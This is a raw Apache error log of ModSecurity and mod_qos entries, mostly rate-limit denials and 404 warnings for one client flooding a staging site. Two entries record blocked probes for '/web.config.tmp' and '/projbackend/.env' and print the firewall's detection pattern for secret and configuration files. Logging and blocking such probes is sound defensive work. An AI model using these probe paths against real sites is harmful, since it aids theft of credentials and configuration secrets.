[Tue May 26 19:53:51.436329 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9kqK9k_ZUB2Vp25ErwAAAd0"]
[Tue May 26 19:53:51.440303 2026] [security2:error] [pid 93867:tid 94073] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9pCDfrjqoHpuuBKrkwAAATg"]
[Tue May 26 19:53:51.447418 2026] [security2:error] [pid 86490:tid 86684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9lZMwN0DpLVWo6Ku8gAAAMU"]
[Tue May 26 19:53:51.455783 2026] [security2:error] [pid 93867:tid 94062] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9pCDfrjqoHpuuBKrmgAAATM"]
[Tue May 26 19:53:51.501979 2026] [security2:error] [pid 93868:tid 94320] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/web.config.tmp"] [unique_id "ahWs90qK9k_ZUB2Vp25E0AAAAc0"]
[Tue May 26 19:53:51.560340 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs91ZMwN0DpLVWo6KvggAAAQQ
[Tue May 26 19:53:51.562901 2026] [qos:error] [pid 93868:tid 94328] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs90qK9k_ZUB2Vp25E0QAAAdU
[Tue May 26 19:53:51.566736 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvhQAAAOw
[Tue May 26 19:53:51.568465 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvhgAAAOI
[Tue May 26 19:53:51.573388 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvhwAAAOE
[Tue May 26 19:53:51.580243 2026] [qos:error] [pid 86490:tid 86637] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KviAAAAJY
[Tue May 26 19:53:51.586500 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs92DRMqfxdEDkoszLzgAAABs
[Tue May 26 19:53:51.597884 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvjAAAALg
[Tue May 26 19:53:51.602785 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvjQAAAJc
[Tue May 26 19:53:51.603925 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvjgAAAPo
[Tue May 26 19:53:51.668306 2026] [security2:error] [pid 93868:tid 94327] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/projbackend/.env"] [unique_id "ahWs90qK9k_ZUB2Vp25E1AAAAdQ"]
[Tue May 26 19:53:51.712217 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvlgAAAIY
[Tue May 26 19:53:51.713981 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvlwAAAIg
[Tue May 26 19:53:51.715987 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvmAAAAMI
[Tue May 26 19:53:51.718594 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvmQAAAJE
[Tue May 26 19:53:51.734188 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs92DRMqfxdEDkoszLzwAAACk
[Tue May 26 19:53:51.737644 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvmgAAAMU
[Tue May 26 19:53:51.751791 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvmwAAAME
[Tue May 26 19:53:51.752732 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvnAAAALQ
[Tue May 26 19:53:51.752789 2026] [qos:error] [pid 86490:tid 86688] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvnQAAAMk
[Tue May 26 19:53:51.755751 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvngAAAIo
[Tue May 26 19:53:51.864347 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvnwAAAPs
[Tue May 26 19:53:51.864594 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvoAAAAN0
[Tue May 26 19:53:51.865118 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvoQAAAPQ
[Tue May 26 19:53:51.870946 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvogAAAQQ
[Tue May 26 19:53:51.882461 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs92DRMqfxdEDkoszL0AAAAFE
[Tue May 26 19:53:51.972405 2026] [security2:error] [pid 86490:tid 86652] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs91ZMwN0DpLVWo6KveAAAAKU"]
[Tue May 26 19:53:51.990067 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvowAAAOw
[Tue May 26 19:53:51.990889 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvpAAAAOI
[Tue May 26 19:53:51.992045 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvpQAAAOE
[Tue May 26 19:53:51.992789 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvpwAAAOE
[Tue May 26 19:53:51.993321 2026] [qos:error] [pid 86490:tid 86637] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvpgAAAJY
[Tue May 26 19:53:52.012676 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KvqAAAALg
[Tue May 26 19:53:52.013809 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KvqQAAAJc
[Tue May 26 19:53:52.014875 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KvqgAAAPo
[Tue May 26 19:53:52.022615 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KvqwAAAJg
[Tue May 26 19:53:52.030008 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-GDRMqfxdEDkoszL0QAAAGc
[Tue May 26 19:53:52.279053 2026] [security2:error] [pid 93867:tid 94211] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9pCDfrjqoHpuuBKrlQAAAXc"]
[Tue May 26 19:53:52.280282 2026] [security2:error] [pid 93867:tid 94173] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9pCDfrjqoHpuuBKrjwAAAWc"]
[Tue May 26 19:53:52.285196 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9mDRMqfxdEDkoszLsQAAAEA"]
[Tue May 26 19:53:52.286271 2026] [security2:error] [pid 93867:tid 94235] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9pCDfrjqoHpuuBKrkgAAAYM"]
[Tue May 26 19:53:52.287298 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9mDRMqfxdEDkoszLswAAAAE"]
[Tue May 26 19:53:52.288522 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9mDRMqfxdEDkoszLqgAAAFQ"]
[Tue May 26 19:53:52.289929 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9lZMwN0DpLVWo6Ku9wAAAOU"]
[Tue May 26 19:53:52.294821 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9mDRMqfxdEDkoszLqwAAAEg"]
[Tue May 26 19:53:52.297080 2026] [security2:error] [pid 86490:tid 86648] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9lZMwN0DpLVWo6Ku-AAAAKE"]
[Tue May 26 19:53:52.309878 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9mDRMqfxdEDkoszLsAAAAF0"]
[Tue May 26 19:53:52.314671 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9lZMwN0DpLVWo6KvCwAAAPY"]
[Tue May 26 19:53:52.318836 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9kqK9k_ZUB2Vp25EuAAAAak"]
[Tue May 26 19:53:52.320494 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9kqK9k_ZUB2Vp25EuQAAAaY"]
[Tue May 26 19:53:52.321423 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9kqK9k_ZUB2Vp25EtwAAAaU"]
[Tue May 26 19:53:52.326418 2026] [security2:error] [pid 93868:tid 94352] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9kqK9k_ZUB2Vp25EugAAAe0"]
[Tue May 26 19:53:52.348543 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs91ZMwN0DpLVWo6KvSgAAAM8"]
[Tue May 26 19:53:52.349967 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9mDRMqfxdEDkoszLtAAAAAc"]
[Tue May 26 19:53:52.358887 2026] [security2:error] [pid 93867:tid 94047] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9pCDfrjqoHpuuBKrmwAAASs"]
[Tue May 26 19:53:52.374906 2026] [security2:error] [pid 86490:tid 86741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9lZMwN0DpLVWo6KvFQAAAP4"]
[Tue May 26 19:53:52.376101 2026] [security2:error] [pid 86490:tid 86729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9lZMwN0DpLVWo6KvDgAAAPI"]
[Tue May 26 19:53:52.380652 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs90qK9k_ZUB2Vp25EwgAAAcw"]
[Tue May 26 19:53:52.393873 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs91ZMwN0DpLVWo6KvTQAAAKY"]
[Tue May 26 19:53:52.394679 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9lZMwN0DpLVWo6KvGAAAAJQ"]
[Tue May 26 19:53:52.410880 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs92DRMqfxdEDkoszLwwAAAEc"]
[Tue May 26 19:53:52.414737 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs90qK9k_ZUB2Vp25EzQAAAck"]
[Tue May 26 19:53:52.417434 2026] [security2:error] [pid 93867:tid 94220] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs95CDfrjqoHpuuBKroAAAAXw"]
[Tue May 26 19:53:52.426980 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs90qK9k_ZUB2Vp25EwwAAAbQ"]
[Tue May 26 19:53:52.437709 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs92DRMqfxdEDkoszLxgAAAHY"]
[Tue May 26 19:53:52.441103 2026] [security2:error] [pid 93868:tid 94326] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs90qK9k_ZUB2Vp25ExQAAAdM"]
[Tue May 26 19:53:52.456391 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs92DRMqfxdEDkoszLxQAAAHU"]
[Tue May 26 19:53:52.456815 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs92DRMqfxdEDkoszLyQAAAEY"]
[Tue May 26 19:53:52.460938 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs90qK9k_ZUB2Vp25EzwAAAcY"]
[Tue May 26 19:53:52.560106 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs-FZMwN0DpLVWo6Kv9gAAANk
[Tue May 26 19:53:52.564849 2026] [qos:error] [pid 86490:tid 86634] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs-FZMwN0DpLVWo6Kv-AAAAJM
[Tue May 26 19:53:52.572130 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs-FZMwN0DpLVWo6Kv-wAAAKA
[Tue May 26 19:53:52.576215 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs-FZMwN0DpLVWo6Kv_QAAAKM
[Tue May 26 19:53:52.582320 2026] [qos:error] [pid 86490:tid 86685] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs-FZMwN0DpLVWo6KwAAAAAMY
[Tue May 26 19:53:52.589803 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-GDRMqfxdEDkoszL5gAAAAg
[Tue May 26 19:53:52.593216 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwBQAAAM0
[Tue May 26 19:53:52.605865 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-GDRMqfxdEDkoszL5wAAAGE
[Tue May 26 19:53:52.616343 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwBwAAAOc
[Tue May 26 19:53:52.616570 2026] [qos:error] [pid 86490:tid 86634] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwCAAAAJM
[Tue May 26 19:53:52.737829 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwDQAAAQM
[Tue May 26 19:53:52.738333 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-GDRMqfxdEDkoszL6AAAACg
[Tue May 26 19:53:52.738467 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwDgAAAKA
[Tue May 26 19:53:52.739073 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-GDRMqfxdEDkoszL6QAAACg
